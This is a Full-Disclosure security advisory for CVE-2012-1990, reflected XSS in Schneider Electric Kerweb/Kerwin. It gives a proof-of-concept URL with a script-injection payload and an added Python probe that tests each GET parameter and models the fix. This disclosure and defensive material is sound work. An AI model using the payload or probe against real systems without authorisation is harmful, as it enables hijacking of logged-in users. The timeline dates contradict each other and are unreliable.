[Full-disclosure] [CVE-2012-1990] Kerweb/Kerwin XSS vulnerabilities

From: phocean (0x90phocean.net)
Date: Sat May 05 2012 - 11:26:43 CDT


Kerweb/Kerwin XSS vulnerabilities

Severity:
Moderate

Vendor:
Schneider Electric

Versions Affected:
Kerweb < 3.0.1
Kerwin < 6.0.1

Description:
Input fields used for searching and displaying content are neither validated nor output-encoded before being written back into the page.
As a result, the web application suffers from multiple reflected XSS vulnerabilities.
Exploitation is made easier because the parameters are passed with the HTTP GET method, so the payload can be delivered as a single link to a logged-in user.

Example:
A URL can be forged by injecting script into one of the parameters, such as 'evtvariablename' here (the leading "</script> closes the script context the value is reflected into before opening a new one):
http://<server>/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename="</script><script>alert(1)</script>"&evtdevicename=&evtnature=&evttype=&gtduration=&ltduration=&gtdurationvalue=&gtdurationwide=1&ltdurationvalue=&ltdurationwide=1
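The advisory describes the flaw but not a way to check for it. The following is an added example, not part of the original advisory and not Kerweb/Kerwin code: a small reflected-XSS probe that takes the GET parameters from the proof-of-concept URL, injects the same canary payload into each one in turn and reports which parameters come back unencoded. The two renderers are constructed stand-ins, `render_vulnerable` modelling what the advisory describes (the value copied verbatim into a JavaScript string) and `render_hardened` showing the corresponding fix; the abbreviated `ADVISORY_URL` and all function names are assumptions for the example.

```python
"""Reflected-XSS probe for GET-parameter-driven pages.

Added example, not part of the original advisory and not Kerweb/Kerwin code.
`render_vulnerable` and `render_hardened` are constructed stand-ins for a
server; `find_reflected_params` works against any callable that maps a
query dict to an HTML body, so it can equally drive real HTTP requests.
"""
import json
from urllib.parse import urlsplit, parse_qs

# Abbreviated form of the advisory's proof-of-concept URL, used here only
# to extract the names of the GET parameters the page accepts.
ADVISORY_URL = ("http://server/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms"
                "&dt=&evtvariablename=&evtdevicename=&evtnature=&evttype=&gtdurationwide=1")

# Same payload as the advisory: closes the reflected string and script
# element, then opens a fresh script element.
CANARY = '"</script><script>alert(1)</script>"'


def query_params(url):
    """Return the GET parameters of a URL as a dict of single values."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def render_vulnerable(params):
    """Constructed model of the flaw: the parameter value is dropped into a
    JavaScript string literal with no encoding at all."""
    name = params.get("evtvariablename", "")
    return ('<html><body><script>var filter = "' + name + '";</script>'
            '<p>Events</p></body></html>')


def js_string(value):
    """Encode a value for use inside a JavaScript string literal that lives
    in an HTML <script> block.  json.dumps handles quotes, backslashes and
    control characters; the extra replacements stop a payload such as
    '</script>' from terminating the enclosing script element, which HTML
    parsers do before the JavaScript engine ever sees the string."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_hardened(params):
    """Same page as render_vulnerable, with context-correct encoding."""
    name = params.get("evtvariablename", "")
    return ('<html><body><script>var filter = ' + js_string(name) + ';</script>'
            '<p>Events</p></body></html>')


def find_reflected_params(render, base_params, payload=CANARY):
    """Inject `payload` into each parameter in turn and return the names of
    those whose response contains the payload verbatim, i.e. unencoded."""
    vulnerable = []
    for name in base_params:
        probe = dict(base_params)
        probe[name] = payload
        body = render(probe)
        if payload in body:
            vulnerable.append(name)
    return vulnerable


if __name__ == "__main__":
    base = query_params(ADVISORY_URL)
    print("vulnerable renderer:", find_reflected_params(render_vulnerable, base))
    print("hardened renderer:  ", find_reflected_params(render_hardened, base))
```

Against a live target, replace the renderer with a function that sends the probe dict as a GET request and returns the response body; a verbatim match is a strong signal, but a parameter that is encoded for one context (HTML entities) and still reflected into another (a script block, an attribute) needs a payload tailored to that context, which is why the canary here mirrors the advisory's `"</script>` prefix rather than a bare `<script>` tag.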

Vendor status:
Vendor was contacted and a fix was released (with Kerweb 3.0.1 and Kerwin 6.0.1)

Mitigation:
Upgrade to Kerweb 3.0.1 and Kerwin 6.0.1

CVE:
CVE-2012-1990

Timeline:
06/20/2011: vendor disclosure (ticket reference: KN10915)
07/22/2011: vendor response
09/01/2012: fix released
05/05/2012: public disclosure

--- phocean


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/